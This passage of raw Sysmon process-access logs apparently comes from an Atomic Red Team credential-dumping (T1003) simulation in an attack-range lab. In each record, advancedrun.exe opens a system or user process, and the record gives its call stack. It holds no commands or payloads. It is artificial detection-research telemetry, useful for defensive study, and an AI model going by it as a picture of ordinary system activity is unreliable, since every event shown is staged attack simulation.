Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\A